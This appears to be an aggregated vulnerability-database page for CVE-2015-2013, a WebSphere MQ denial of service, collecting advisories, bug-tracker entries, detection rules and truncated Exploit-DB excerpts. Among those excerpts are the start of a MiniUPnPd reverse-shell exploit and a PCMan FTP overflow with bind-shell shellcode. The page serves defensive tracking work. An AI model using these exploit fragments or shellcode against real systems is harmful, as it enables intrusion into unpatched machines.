CVE-2015-2013
published 2015-09-14CVE-2015-2013: IBM WebSphere MQ 7.0.1 before 7.0.1.13 allows remote attackers to cause a denial of service (channel-agent abend and process outage) via a crafted selection…
PriorityP423medium5CVSS 2.0
AVNACLAuNCNINAP
EPSS
2.37%
81.8th percentile
IBM WebSphere MQ 7.0.1 before 7.0.1.13 allows remote attackers to cause a denial of service (channel-agent abend and process outage) via a crafted selection string in an MQI call.
Affected
17 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ibm | websphere_mq | — | — |
| ibm | websphere_mq | — | — |
| ibm | websphere_mq | — | — |
| ibm | websphere_mq | — | — |
| ibm | websphere_mq | — | — |
| ibm | websphere_mq | — | — |
| ibm | websphere_mq | — | — |
| ibm | websphere_mq | — | — |
| ibm | websphere_mq | — | — |
| ibm | websphere_mq | — | — |
| ibm | websphere_mq | — | — |
| ibm | websphere_mq | — | — |
| ibm | websphere_mq | — | — |
| libarchive | libarchive | >= 0 < 3.1.2-7ubuntu2.1 | 3.1.2-7ubuntu2.1 |
| linux | linux_kernel | >= 0 < 3.13.0-48.80 | 3.13.0-48.80 |
| openldap | openldap | >= 0 < 2.4.31-1+nmu2ubuntu8.1 | 2.4.31-1+nmu2ubuntu8.1 |
| wouter_verhelst | nbd | >= 0 < 1:3.7-1ubuntu0.1 | 1:3.7-1ubuntu0.1 |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
osv7.5HIGH
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7rc4-4mhp-v4cw: IBM WebSphere MQ 7
ghsa_unreviewed·2022-05-17
CVE-2015-2013 [MEDIUM] GHSA-7rc4-4mhp-v4cw: IBM WebSphere MQ 7
IBM WebSphere MQ 7.0.1 before 7.0.1.13 allows remote attackers to cause a denial of service (channel-agent abend and process outage) via a crafted selection string in an MQI call.
OSV
linux-lts-vivid vulnerabilities
osv·2016-03-14·CVSS 6.2
CVE-2016-3134 linux-lts-vivid vulnerabilities
linux-lts-vivid vulnerabilities
Ben Hawkes discovered that the Linux netfilter implementation did not
correctly perform validation when handling IPT_SO_SET_REPLACE events. A
local unprivileged attacker could use this to cause a denial of service
(system crash) or possibly execute arbitrary code with administrative
privileges. (CVE-2016-3134)
It was discovered that the Linux kernel did not properly enforce rlimits
for file descriptors sent over UNIX domain sockets. A local attacker could
use this to cause a denial of service. (CVE-2013-4312)
Ralf Spenneberg discovered that the USB driver for Clie devices in the
Linux kernel did not properly validate the endpoints reported by the
device. An attacker with physical access could cause a denial of service
(system crash). (CVE-2015-7566)
Ralf
OSV
linux-lts-utopic vulnerabilities
osv·2016-03-14·CVSS 6.2
CVE-2016-3134 linux-lts-utopic vulnerabilities
linux-lts-utopic vulnerabilities
Ben Hawkes discovered that the Linux netfilter implementation did not
correctly perform validation when handling IPT_SO_SET_REPLACE events. A
local unprivileged attacker could use this to cause a denial of service
(system crash) or possibly execute arbitrary code with administrative
privileges. (CVE-2016-3134)
It was discovered that the Linux kernel did not properly enforce rlimits
for file descriptors sent over UNIX domain sockets. A local attacker could
use this to cause a denial of service. (CVE-2013-4312)
It was discovered that a race condition existed when handling heartbeat-
timeout events in the SCTP implementation of the Linux kernel. A remote
attacker could use this to cause a denial of service. (CVE-2015-8767)
Andy Lutomirski discovered a race
OSV
linux-lts-utopic vulnerabilities
osv·2016-02-02·CVSS 5.3
CVE-2013-7446 linux-lts-utopic vulnerabilities
linux-lts-utopic vulnerabilities
It was discovered that a use-after-free vulnerability existed in the
AF_UNIX implementation in the Linux kernel. A local attacker could use
crafted epoll_ctl calls to cause a denial of service (system crash) or
expose sensitive information. (CVE-2013-7446)
It was discovered that the KVM implementation in the Linux kernel did not
properly restore the values of the Programmable Interrupt Timer (PIT). A
user-assisted attacker in a KVM guest could cause a denial of service in
the host (system crash). (CVE-2015-7513)
It was discovered that the Linux kernel keyring subsystem contained a race
between read and revoke operations. A local attacker could use this to
cause a denial of service (system crash). (CVE-2015-7550)
Sasha Levin discovered that the Reliable
OSV
nbd vulnerabilities
osv·2015-07-22·CVSS 7.5
CVE-2013-6410 nbd vulnerabilities
nbd vulnerabilities
It was discovered that NBD incorrectly handled IP address matching. A
remote attacker could use this issue with an IP address that has a partial
match and bypass access restrictions. This issue only affected
Ubuntu 12.04 LTS. (CVE-2013-6410)
Tuomas Räsänen discovered that NBD incorrectly handled wrong export names
and closed connections during negotiation. A remote attacker could use this
issue to cause NBD to crash, resulting in a denial of service. This issue
only affected Ubuntu 12.04 LTS. (CVE-2013-7441)
Tuomas Räsänen discovered that NBD incorrectly handled signals. A remote
attacker could use this issue to cause NBD to crash, resulting in a denial
of service. (CVE-2015-0847)
OSV
openldap vulnerabilities
osv·2015-05-26·CVSS 2.6
CVE-2012-1164 openldap vulnerabilities
openldap vulnerabilities
It was discovered that OpenLDAP incorrectly handled certain search queries
that returned empty attributes. A remote attacker could use this issue to
cause OpenLDAP to assert, resulting in a denial of service. This issue only
affected Ubuntu 12.04 LTS. (CVE-2012-1164)
Michael Vishchers discovered that OpenLDAP improperly counted references
when the rwm overlay was used. A remote attacker could use this issue to
cause OpenLDAP to crash, resulting in a denial of service. (CVE-2013-4449)
It was discovered that OpenLDAP incorrectly handled certain empty attribute
lists in search requests. A remote attacker could use this issue to cause
OpenLDAP to crash, resulting in a denial of service. (CVE-2015-1545)
OSV
libarchive vulnerabilities
osv·2015-03-25·CVSS 5.0
CVE-2015-2304 libarchive vulnerabilities
libarchive vulnerabilities
It was discovered that the libarchive bsdcpio utility extracted absolute
paths by default without using the --insecure flag, contrary to
expectations. If a user or automated system were tricked into extracting
cpio archives containing absolute paths, a remote attacker may be able to
write to arbitrary files. (CVE-2015-2304)
Fabian Yamaguchi discovered that libarchive incorrectly handled certain
type conversions. A remote attacker could possibly use this issue to cause
libarchive to crash, resulting in a denial of service. This issue only
affected Ubuntu 12.04 LTS. (CVE-2013-0211)
OSV
linux vulnerabilities
osv·2015-03-24·CVSS 2.1
CVE-2015-0274 linux vulnerabilities
linux vulnerabilities
Eric Windisch discovered flaw in how the Linux kernel's XFS file system
replaces remote attributes. A local access with access to an XFS file
system could exploit this flaw to escalate their privileges.
(CVE-2015-0274)
A flaw was discovered in the automatic loading of modules in the crypto
subsystem of the Linux kernel. A local user could exploit this flaw to load
installed kernel modules, increasing the attack surface and potentially
using this to gain administrative privileges. (CVE-2013-7421)
The Linux kernel's splice system call did not correctly validate its
parameters. A local, unprivileged user could exploit this flaw to cause a
denial of service (system crash). (CVE-2014-7822)
A flaw was discovered in the crypto subsystem when screening module names
for au
Red Hat
webkitgtk: use-after-free vulnerability in the handling of input (WSA-2015-0001)
vendor_redhat·2015-01-26·CVSS 7.5
CVE-2013-2871 [HIGH] CWE-416 webkitgtk: use-after-free vulnerability in the handling of input (WSA-2015-0001)
webkitgtk: use-after-free vulnerability in the handling of input (WSA-2015-0001)
Use-after-free vulnerability in Google Chrome before 28.0.1500.71 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the handling of input.
Statement: Red Hat Product Security has rated this issue as having Moderate security impact. This issue is not currently planned to be addressed in future updates. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/.
Package: webkitgtk (Red Hat Enterprise Linux 6) - Will not fix
Package: webkitgtk3 (Red Hat Enterprise Linux 7) - Will not fix
Red Hat
webkitgtk: use-after-free in the HTMLFormElement::prepareForSubmission() (WSA-2015-0001)
vendor_redhat·2015-01-26·CVSS 6.8
CVE-2013-2927 [MEDIUM] CWE-416 webkitgtk: use-after-free in the HTMLFormElement::prepareForSubmission() (WSA-2015-0001)
webkitgtk: use-after-free in the HTMLFormElement::prepareForSubmission() (WSA-2015-0001)
Use-after-free vulnerability in the HTMLFormElement::prepareForSubmission function in core/html/HTMLFormElement.cpp in Blink, as used in Google Chrome before 30.0.1599.101, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to submission for FORM elements.
Statement: Red Hat Product Security has rated this issue as having Moderate security impact. This issue is not currently planned to be addressed in future updates. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/.
Package: webkitgtk (Red Hat Enterprise Linux 6) - Will not fix
Package: webkitgtk3 (Red Ha
Suricata
ET HUNTING Microsoft Office Memory Corruption (CVE-2015-1641)
suricata·2025-01-27·CVSS 7.8
CVE-2015-1641 [HIGH] ET HUNTING Microsoft Office Memory Corruption (CVE-2015-1641)
ET HUNTING Microsoft Office Memory Corruption (CVE-2015-1641)
Rule: alert tcp any any -> $HOME_NET any (msg:"ET HUNTING Microsoft Office Memory Corruption (CVE-2015-1641)"; flow:established,to_client; file.data; content:"|7b 5c|rtf"; content:"|7b 5c 2a 5c|objdata|20|0105000002000000"; content:"6f746b6c6f6164722e5752417373656d626c792e3100"; fast_pattern; nocase; distance:8; content:"d0cf11e0a1b11ae1"; nocase; distance:0; content:"|7c 34 24 04|"; reference:url,degsew.wordpress.com/2016/03/28/new-microst-office-word-2007-2013-exploit-cve-2015-1641-analysis/; reference:cve,2015-1641; classtype:bad-unknown; sid:2059680; rev:1; metadata:attack_target Client_Endpoint, tls_state TLSDecrypt, created_at 2025_01_27, cve CVE_2015_1641, deployment Perimeter, deployment SSLDecrypt, confidence Medium, s
Suricata
ET WEB_CLIENT Possible CVE-2013-1710/CVE-2012-3993 Firefox Exploit Attempt
suricata·2015-05-08·CVSS 9.3
CVE-2013-1710 [CRITICAL] ET WEB_CLIENT Possible CVE-2013-1710/CVE-2012-3993 Firefox Exploit Attempt
ET WEB_CLIENT Possible CVE-2013-1710/CVE-2012-3993 Firefox Exploit Attempt
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Possible CVE-2013-1710/CVE-2012-3993 Firefox Exploit Attempt"; flow:established,to_client; file.data; content:"generateCRMFRequest"; nocase; fast_pattern; content:"InstallTrigger"; nocase; content:"__exposedProps__"; nocase; content:"__defineGetter__"; nocase; content:"getInstallForURL"; nocase; content:".install|28|"; nocase; content:"x-xpinstall"; nocase; reference:cve,CVE-2013-1710; reference:cve,CVE-2012-3993; classtype:attempted-user; sid:2021078; rev:4; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2015_05_08, deployment Perimeter, confidence Medium, signature_sever
YARA
cve_2013_0074
yara
cve_2013_0074
rule cve_2013_0074
{
meta:
author = "Kaspersky Lab"
filetype = "Win32 EXE"
date = "2015-07-23"
version = "1.0"
strings:
$b2="Can't find Payload() address" ascii wide
$b3="/SilverApp1;component/App.xaml" ascii wide
$b4="Can't allocate ums after buf[]" ascii wide
$b5="------------ START ------------"
condition:
( (2 of ($b*)) )
}
Exploit-DB
Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)
exploitdb·2015-12-14
CVE-2015-6132 Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)
Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=556
It is possible for an attacker to execute a DLL planting attack in Microsoft Office 2010 on Windows 7 x86 with a specially crafted OLE object. This attack also works on Office 2013 running on Windows 7 x64. Other platforms were not tested. The attached POC document "planted-mqrt.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {ecabafc9-7f19-11d2-978e-0000f8757e2a} (formatted as pack(">IHHBBBBBBBB")). This object has a InProcServer32 pointing to comsvcs.dll. Specifically the CQueueAdmin object implemented in the dll.
When a user op
Exploit-DB
Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
exploitdb·2015-09-16
CVE-2015-2510 Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=469
The following crash was observed in Microsoft Office 2007 Excel with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 3013413838_orig.xls
Crashing File: 3013413838_crash.xls
Minimized Crashing File: 3013413838_min.xls
The minimized crashing file shows a one bit delta from the original file at offset 0x139F. OffVis did not reveal anything unique about this offset in the minimized file.
File Versions:
Excel.exe: 12.0.6718.5000
OGL.dll: 12.0.6719.5000
oart.dll: 12.0.6683.5002
GD
Exploit-DB
Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)
exploitdb·2015-08-07
CVE-2013-5065 Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)
Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)
---
/*
################################################################
# Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)
# Date: 2015-08-03
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP SP2 x86-64
# Windows 2003 SP2 x86
# Windows 2003 SP2 x86-64
# Windows 2003 SP2 IA-64
# Supported vulnerable software:
# Windows XP SP3 x86
# Windows 2003 SP2 x86
# Tested on:
# Windows XP SP3 x86 EN
# Windows 2003 SP2 x86 EN
# CVE ID: 2013-5065
################################################################
# Vulnerability description:
# NDPROXY is a system-provided driver that interfaces WAN
# miniport drivers, call managers, and miniport call m
Exploit-DB
INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service
exploitdb·2015-07-07·CVSS 7.8
CVE-2013-0230 [HIGH] INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service
INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service
---
#!/usr/bin/perl
#
# miniupnpd/1.0 remote denial of service exploit
#
# Copyright 2015 (c) Todor Donev
# [email protected]
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# The SSDP protocol can discover Plug & Play devices,
# with uPnP (Universal Plug and Play). SSDP is HTTP
# like protocol and work with NOTIFY and M-SEARCH
# methods.
#
# See also:
# CVE-2013-0229
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229
# CVE-2013-0230
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
#
# Tested on
# Device Name : IMW-C920W
# Device Manufacturer : INFOMARK (http://infomark.co.kr)
#
# These devices are commonly used by Max Telecom, Bulgaria
#
# Disclaimer:
# This or previous progra
Exploit-DB
MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series
exploitdb·2015-04-27·CVSS 10.0
CVE-2013-0230 [CRITICAL] MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series
MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series
---
#!/usr/bin/env python
# Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series
# Date: 26.04.2015
# Exploit Author: Onur ALANBEL (BGA)
# Vendor Homepage: http://miniupnp.free.fr/
# Version: 1.0
# Architecture: MIPS
# Tested on: AirTies RT-204v3
# CVE : 2013-0230
# Exploit gives a reverse shell to lhost:lport
# Details: https://www.exploit-db.com/docs/english/36806-developing-mips-exploits-to-hack-routers.pdf
import urllib2
from string import join
from argparse import ArgumentParser
from struct import pack
from socket import inet_aton
BYTES = 4
def hex2str(value, size=BYTES):
data = ""
for i in range(0, size):
data += chr((value >> (8*i)) & 0xFF)
data = data[::-1]
return dat
Exploit-DB
PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow
exploitdb·2015-02-14
CVE-2013-4730 PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow
PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow
---
# Title: PCMan FTP Server v2.0.7 Buffer Overflow - MKD Command
# Date : 12/02/2015
# Author: R-73eN
# Software: PCMan FTP Server v2.0.7
# Tested On Windows Xp SP3
import socket
#348 Bytes Bind Shell Port TCP/4444
shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8"
shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08"
shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27"
shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24"
shellcode += "\xd0\xd4
Bugzilla
CVE-2013-4312 kernel: File descriptors passed over unix sockets are not properly accounted
bugzilla·2016-01-12·CVSS 6.2
CVE-2013-4312 [MEDIUM] CVE-2013-4312 kernel: File descriptors passed over unix sockets are not properly accounted
CVE-2013-4312 kernel: File descriptors passed over unix sockets are not properly accounted
It was found that process could allocate and accumulate far more FDs than the process' limit by sending them over a unix socket then closing them to keep the process' fd count low, which could result into a local DoS against kernel by depleting all available memory.
Upstream patch:
https://git.kernel.org/cgit/linux/kernel/git/davem/net.git/commit/?id=712f4aad406b
Discussion:
https://lkml.org/lkml/2015/12/28/155
Discussion:
This issue went public via debian security advisory:
https://www.debian.org/security/2016/dsa-3448
---
Created kernel tracking bugs for this issue:
Affects: fedora-all [bug 1300216]
---
Statement:
This issue affects the Linux kernel packages as shipped with Red Hat En
Bugzilla
CVE-2013-7446 kernel: Unix sockets use after free - peer_wait_queue prematurely freed
bugzilla·2015-11-17·CVSS 5.3
CVE-2013-7446 [MEDIUM] CVE-2013-7446 kernel: Unix sockets use after free - peer_wait_queue prematurely freed
CVE-2013-7446 kernel: Unix sockets use after free - peer_wait_queue prematurely freed
A flaw was found in the Linux kernels implementation of Unix sockets. A
server polling for data coming from a client socket may put the peer
socket on a wait list. This peer may close the connection making
the reference on the wait list no longer valid. This could lead to bypssing the permissions on a unix socket, and packets being injected into the stream. This may also panic the machine.
Additional resources:
https://groups.google.com/forum/#!topic/syzkaller/3twDUI4Cpm8
http://seclists.org/oss-sec/2015/q4/321
https://git.kernel.org/cgit/linux/kernel/git/davem/net.git/commit/?id=7d267278a9ece963d77eefec61630223fce08c6c
Discussion:
Created kernel tracking bugs for this issue:
Affects: fedora-all [
Bugzilla
CVE-2013-7444 CVE-2015-6737 CVE-2015-6736 CVE-2015-6727 CVE-2015-6733 CVE-2015-6732 CVE-2015-6731 CVE-2015-6730 CVE-2015-6728 CVE-2015-6729 CVE-2015-6735 CVE-2015-6734 mediawiki: multiple security fix
bugzilla·2015-08-13·CVSS 5.0
CVE-2013-7444 [MEDIUM] CVE-2013-7444 CVE-2015-6737 CVE-2015-6736 CVE-2015-6727 CVE-2015-6733 CVE-2015-6732 CVE-2015-6731 CVE-2015-6730 CVE-2015-6728 CVE-2015-6729 CVE-2015-6735 CVE-2015-6734 mediawiki: multiple security fix
CVE-2013-7444 CVE-2015-6737 CVE-2015-6736 CVE-2015-6727 CVE-2015-6733 CVE-2015-6732 CVE-2015-6731 CVE-2015-6730 CVE-2015-6728 CVE-2015-6729 CVE-2015-6735 CVE-2015-6734 mediawiki: multiple security fixes in 1.25.2, 1.24.3, 1.23.10
Following security issues were fixed in MediaWiki 1.25.2, MediaWiki 1.24.3, MediaWiki 1.23.10:
* Internal review discovered that Special:DeletedContributions did not
properly protect the IP of autoblocked users. This fix makes the
functionality of Special:DeletedContributions consistent with
Special:Contributions and Special:BlockList.
* Internal review discovered that watchlist anti-csrf tokens were not being
compared in constant time, which could allow various timing attacks. This
could allow an attacker to modify a user's watchlist via csrf.
* John Meneri
Bugzilla
CVE-2015-3427 quassel: SQL injection flaw (incomplete fix for CVE-2013-4422)
bugzilla·2015-04-28·CVSS 6.8
CVE-2015-3427 [MEDIUM] CVE-2015-3427 quassel: SQL injection flaw (incomplete fix for CVE-2013-4422)
CVE-2015-3427 quassel: SQL injection flaw (incomplete fix for CVE-2013-4422)
It was discovered that the fix for CVE-2013-4422 was incomplete and did not fix the original SQL injection on reconnection issue.
Upstream patch:
https://github.com/quassel/quassel/commit/6605882f41331c80f7ac3a6992650a702ec71283
Fixed version:
http://quassel-irc.org/node/120
Discussion:
Created quassel tracking bugs for this issue:
Affects: fedora-all [bug 1216076]
Affects: epel-6 [bug 1216077]
Affects: epel-7 [bug 1216078]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to the dependent bugs for status of those individual community products.
Bugzilla
CVE-2013-2875 webkitgtk: out-of-bounds read in the SVG implementation (WSA-2015-0001)
bugzilla·2015-01-27·CVSS 5.0
CVE-2013-2875 [MEDIUM] CVE-2013-2875 webkitgtk: out-of-bounds read in the SVG implementation (WSA-2015-0001)
CVE-2013-2875 webkitgtk: out-of-bounds read in the SVG implementation (WSA-2015-0001)
Following vulnerability was discovered on the 2.4 stable series of WebKitGTK+:
CVE-2013-2875
core/rendering/svg/SVGInlineTextBox.cpp in the SVG implementation in Blink, as used in Google Chrome before 28.0.1500.71, allows remote attackers to cause a denial of service (out-of-bounds read) via unspecified vectors.
External References:
http://webkitgtk.org/security/WSA-2015-0001.html
Discussion:
Created webkitgtk4 tracking bugs for this issue:
Affects: fedora-all [bug 1186276]
---
Created webkitgtk3 tracking bugs for this issue:
Affects: fedora-all [bug 1181092]
---
Statement:
Red Hat Product Security has rated this issue as having Moderate security impact. This issue is not currently planned to
Bugzilla
CVE-2013-7397 async-http-client: SSL/TLS certificate verification is disabled under certain conditions
bugzilla·2014-08-26·CVSS 4.3
CVE-2013-7397 [MEDIUM] CVE-2013-7397 async-http-client: SSL/TLS certificate verification is disabled under certain conditions
CVE-2013-7397 async-http-client: SSL/TLS certificate verification is disabled under certain conditions
It was found that async-http-client would disable SSL/TLS certificate verification under certain conditions, for example if HTTPS communication also uses client certificates. This can be exploited by a Man-in-the-middle (MITM) attack where the attacker can spoof a valid certificate.
Discussion:
Upstream bug:
https://github.com/AsyncHttpClient/async-http-client/issues/352
---
This issue has been addressed in the following products:
JBoss BPM Suite 6.1.0
Via RHSA-2015:0851 https://rhn.redhat.com/errata/RHSA-2015-0851.html
---
This issue has been addressed in the following products:
JBoss BRMS 6.1.0
Via RHSA-2015:0850 https://rhn.redhat.com/errata/RHSA-2015-0850.html
---
async-
http://www-01.ibm.com/support/docview.wss?uid=swg1IV73860http://www-01.ibm.com/support/docview.wss?uid=swg21962479http://www.securitytracker.com/id/1033449http://www-01.ibm.com/support/docview.wss?uid=swg1IV73860http://www-01.ibm.com/support/docview.wss?uid=swg21962479http://www.securitytracker.com/id/1033449
2015-09-14
Published